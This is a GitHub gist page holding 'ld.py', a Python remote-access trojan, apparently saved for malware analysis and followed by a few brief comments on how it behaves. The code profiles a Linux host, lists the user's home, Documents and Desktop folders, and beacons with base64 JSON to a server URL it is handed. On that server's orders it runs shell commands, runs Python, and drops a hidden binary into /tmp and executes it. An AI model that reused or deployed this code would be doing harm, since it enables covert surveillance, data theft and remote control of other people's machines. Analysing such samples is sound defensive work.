Created
March 31, 2026 16:32
-
-
Save jrwren/78928fc5d36206167f32eb4bc489c5dc to your computer and use it in GitHub Desktop.
ld.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import string | |
| import secrets | |
| import os | |
| import pwd | |
| import platform | |
| import time | |
| import sys | |
| import subprocess | |
| import base64 | |
| import shlex | |
| from pathlib import Path | |
| import json | |
| from urllib.parse import urlsplit | |
| import datetime | |
| import http.client | |
| import sys | |
| def get_os(): | |
| arch = platform.machine().lower() | |
| if arch in ("x86_64", "amd64"): | |
| return "linux_x64" | |
| elif "arm" in arch or "aarch" in arch: | |
| return "linux_arm" | |
| else: | |
| return "linux_unknown" | |
| def get_boot_time(): | |
| with open("/proc/uptime", "r") as f: | |
| uptime_seconds = float(f.readline().split()[0]) | |
| boot_time = datetime.datetime.now() - datetime.timedelta(seconds=uptime_seconds) | |
| return boot_time | |
| def get_host_name(): | |
| with open("/proc/sys/kernel/hostname", "r") as f: | |
| return f.read().strip() | |
| def get_user_name(): | |
| return os.getlogin() | |
| def get_installation_time(): | |
| install_log_path = "/var/log/installer" | |
| dpkg_log_path = "/var/log/dpkg.log" | |
| if os.path.exists(install_log_path): | |
| install_time = os.path.getctime(install_log_path) | |
| elif os.path.exists(dpkg_log_path): | |
| install_time = os.path.getctime(dpkg_log_path) | |
| else: | |
| return "" | |
| return datetime.datetime.fromtimestamp(install_time) | |
| def get_system_info(): | |
| manufacturer = "" | |
| product_name = "" | |
| try: | |
| with open("/sys/class/dmi/id/sys_vendor", "r") as f: | |
| manufacturer = f.read().strip() | |
| except FileNotFoundError: | |
| pass | |
| try: | |
| with open("/sys/class/dmi/id/product_name", "r") as f: | |
| product_name = f.read().strip() | |
| except FileNotFoundError: | |
| pass | |
| return manufacturer, product_name | |
| def get_process_list(): | |
| process_list = [] | |
| current_pid = os.getpid() | |
| for pid in os.listdir("/proc"): | |
| if pid.isdigit(): | |
| try: | |
| cmdline_path = os.path.join("/proc", pid, "cmdline") | |
| if os.path.exists(cmdline_path): | |
| with open(cmdline_path, "r") as cmdline_file: | |
| cmdline = cmdline_file.read().replace("\x00", " ").strip() | |
| else: | |
| cmdline = "N/A" | |
| with open(os.path.join("/proc", pid, "stat"), "r") as stat_file: | |
| stat_content = stat_file.read().split() | |
| ppid = int(stat_content[3]) | |
| start_time_ticks = int(stat_content[21]) | |
| with open("/proc/uptime", "r") as uptime_file: | |
| uptime_seconds = float(uptime_file.readline().split()[0]) | |
| system_boot_time = datetime.datetime.now() - datetime.timedelta( | |
| seconds=uptime_seconds | |
| ) | |
| start_time = system_boot_time + datetime.timedelta( | |
| seconds=start_time_ticks | |
| / os.sysconf(os.sysconf_names["SC_CLK_TCK"]) | |
| ) | |
| with open(os.path.join("/proc", pid, "status"), "r") as status_file: | |
| for line in status_file: | |
| if line.startswith("Uid:"): | |
| uid = int(line.split()[1]) | |
| break | |
| else: | |
| uid = -1 | |
| username = "N/A" | |
| if uid != -1: | |
| with open("/etc/passwd", "r") as passwd_file: | |
| for passwd_line in passwd_file: | |
| fields = passwd_line.strip().split(":") | |
| if int(fields[2]) == uid: | |
| username = fields[0] | |
| break | |
| if int(pid) == current_pid: | |
| process_list.append( | |
| (int(pid), ppid, username, start_time, "*" + cmdline) | |
| ) | |
| else: | |
| process_list.append((int(pid), ppid, username, start_time, cmdline)) | |
| except (FileNotFoundError, IndexError, ValueError): | |
| pass | |
| return process_list | |
| def print_process_list(): | |
| process_list = get_process_list() | |
| str = "" | |
| for pid, ppid, username, start_time, cmdline in process_list: | |
| if len(cmdline) > 60: | |
| cmdline = cmdline[:57] + "..." | |
| start_time_str = start_time.strftime("%Y-%m-%d %H:%M:%S") | |
| str += ( | |
| "{:<10} {:<10} {:<15} {:<25} {:<}".format( | |
| pid, ppid, username, start_time_str, cmdline | |
| ) | |
| + "\n" | |
| ) | |
| str += "\n" | |
| return str | |
| def generate_random_string(length): | |
| characters = string.ascii_letters + string.digits | |
| return "".join(secrets.choice(characters) for _ in range(length)) | |
| def do_action_ijt(ijtbin, param): | |
| payload = base64.b64decode(b64_string) | |
| file_path = f"/tmp/.{generate_random_string(6)}" | |
| try: | |
| with open(file_path, "wb") as file: | |
| file.write(payload) | |
| os.chmod(file_path, 0o777) | |
| subprocess.Popen( | |
| [file_path] + shlex.split(param.decode("utf-8", errors="strict")) | |
| ) | |
| except Exception as e: | |
| return { | |
| "status": "Zzz", | |
| "msg": str(e) | |
| } | |
| return { | |
| "status": "Wow", | |
| "msg": "" | |
| } | |
| def get_filelist(PathStr, id, Recurse=False): | |
| p = Path(PathStr) | |
| if not p.exists(): | |
| raise Exception(f"No Exists Such Dir: {PathStr}") | |
| items = p.rglob("*") if Recurse else p.iterdir() | |
| result = [] | |
| for item in items: | |
| stat = item.stat() | |
| created_ts = getattr(stat, "st_birthtime", None) | |
| created = int(created_ts) if created_ts is not None else 0 | |
| modified = int(stat.st_mtime) | |
| hasItems = False | |
| if item.is_dir(): | |
| hasItems = any(item.iterdir()) | |
| result.append({ | |
| "Name": item.name, | |
| "IsDir": item.is_dir(), | |
| "SizeBytes": 0 if item.is_dir() else stat.st_size, | |
| "Created": created, | |
| "Modified": modified, | |
| "HasItems": hasItems | |
| }) | |
| return { | |
| "id": id, | |
| "parent": str(p), | |
| "childs": result | |
| } | |
| def do_action_dir(Paths): | |
| rlt = [] | |
| for item in Paths: | |
| rlt.append(get_filelist(item["path"], item["id"])) | |
| return rlt | |
| def init_dir_info(): | |
| home_dir = Path.home() | |
| init_dir = [ | |
| home_dir, | |
| home_dir / ".config", | |
| home_dir / "Documents", | |
| home_dir / "Desktop", | |
| ] | |
| rlt = [] | |
| idx = 0 | |
| for item in init_dir: | |
| if item.exists(): | |
| rlt.append(get_filelist(str(item), "FirstReqPath-" + str(idx))) | |
| idx = idx + 1 | |
| return rlt | |
| def do_run_scpt(cmdline): | |
| try: | |
| result = subprocess.run( | |
| cmdline, | |
| shell=True, | |
| stdout=subprocess.PIPE, | |
| stderr=subprocess.STDOUT, | |
| text=True | |
| ) | |
| return { | |
| "status": "Wow", | |
| "msg": result.stdout | |
| } | |
| except Exception as e: | |
| return { | |
| "status": "Zzz", | |
| "msg": str(e) | |
| } | |
| def do_action_scpt(scpt, param): | |
| if not scpt: | |
| return do_run_scpt(param) | |
| try: | |
| payload = base64.b64decode(scpt).decode("utf-8", errors="strict") | |
| result = subprocess.run( | |
| ["python3", "-c", payload] + shlex.split(param), | |
| stdout=subprocess.PIPE, | |
| stderr=subprocess.STDOUT, | |
| text=True | |
| ) | |
| return { | |
| "status": "Wow", | |
| "msg": result.stdout | |
| } | |
| except Exception as e: | |
| return { | |
| "status": "Zzz", | |
| "msg": str(e) | |
| } | |
| def send_post_request(full_url, data): | |
| try: | |
| url_parts = urlsplit(full_url) | |
| host = url_parts.netloc | |
| path = url_parts.path or "/" | |
| if url_parts.query: | |
| path += "?" + url_parts.query | |
| if isinstance(data, str): | |
| data = data.encode("utf-8") | |
| if url_parts.scheme == "https": | |
| conn = http.client.HTTPSConnection(host, timeout=60) | |
| else: | |
| conn = http.client.HTTPConnection(host, timeout=60) | |
| headers = { | |
| "Content-Type": "application/x-www-form-urlencoded", | |
| "User-Agent": "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)", | |
| } | |
| conn.request("POST", path, data, headers) | |
| response = conn.getresponse() | |
| response_data = response.read() | |
| conn.close() | |
| return response_data | |
| except Exception: | |
| return None | |
| def send_result(url, body): | |
| encoded = base64.b64encode( | |
| json.dumps(body, ensure_ascii=False).encode("utf-8") | |
| ).decode() | |
| return send_post_request(url, encoded) | |
| def process_request(url, uid, data) -> bool: | |
| if len(data) == 0: | |
| return False | |
| json_obj = json.loads(data) | |
| if json_obj.get("type") == "kill": | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_kill", | |
| "cmdid": json_obj.get("CmdID"), | |
| "uid": uid, | |
| "status": "success", | |
| } | |
| send_result(url, body) | |
| sys.exit(0) | |
| elif json_obj.get("type") == "peinject": | |
| rlt = do_action_ijt( | |
| json_obj.get("IjtBin"), | |
| json_obj.get("Param") | |
| ) | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_peinject", | |
| "cmdid": json_obj.get("CmdID"), | |
| "uid": uid, | |
| "status": rlt.get("status"), | |
| "msg": rlt.get("msg"), | |
| } | |
| send_result(url, body) | |
| elif json_obj.get("type") == "runscript": | |
| rlt = do_action_scpt( | |
| json_obj.get("Script"), | |
| json_obj.get("Param") | |
| ) | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_runscript", | |
| "cmdid": json_obj.get("CmdID"), | |
| "uid": uid, | |
| "status": rlt.get("status"), | |
| "msg": rlt.get("msg"), | |
| } | |
| send_result(url, body) | |
| elif json_obj.get("type") == "rundir": | |
| rlt = do_action_dir(json_obj.get("ReqPaths")) | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_rundir", | |
| "cmdid": json_obj.get("CmdID"), | |
| "status": "Wow", | |
| "uid": uid, | |
| "msg": rlt, | |
| } | |
| send_result(url, body) | |
| return True | |
| def main_work(url, uid): | |
| boot_time = str(get_boot_time()) | |
| installation_time = str(get_installation_time()) | |
| timezone = str(datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo) | |
| manufacturer, product_name = get_system_info() | |
| os_version = platform.system() + " " + platform.release() + " " | |
| os = get_os() | |
| while True: | |
| current_time = str(datetime.datetime.now()) | |
| ps = print_process_list() | |
| data = { | |
| "hostname": get_host_name(), | |
| "username": get_user_name(), | |
| "os": os, | |
| "version": os_version, | |
| "timezone": timezone, | |
| "installDate": installation_time, | |
| "bootTimeString": boot_time, | |
| "currentTimeString": current_time, | |
| "modelName": manufacturer, | |
| "cpuType": product_name, | |
| "processList": ps | |
| } | |
| body = { | |
| "type": "BaseInfo", | |
| "uid": uid, | |
| "data": data | |
| } | |
| response_content = send_result(url, body) | |
| if response_content: | |
| result = process_request(url, uid, response_content) | |
| time.sleep(60) | |
| def work(): | |
| url = sys.argv[1] | |
| uid = generate_random_string(16) | |
| os = get_os() | |
| dir_info = init_dir_info() | |
| body = { | |
| "type": "FirstInfo", | |
| "uid": uid, | |
| "os": os, | |
| "content": dir_info | |
| } | |
| send_result(url, body) | |
| main_work(url, uid) | |
| return True | |
| work() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| see below |
Author
Author
Interestingly, there is a bug in get_process_list on the whitespace splitting. process names in /proc/N/stat can have whitespace, so for example "tmux server" and "tmux client" will not get reported in the list.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Posts base64 encoded payload like:
which, when I ran in a container decodes to:
Interestingly, processList is empty here, and I don't know why.
The first request posts this: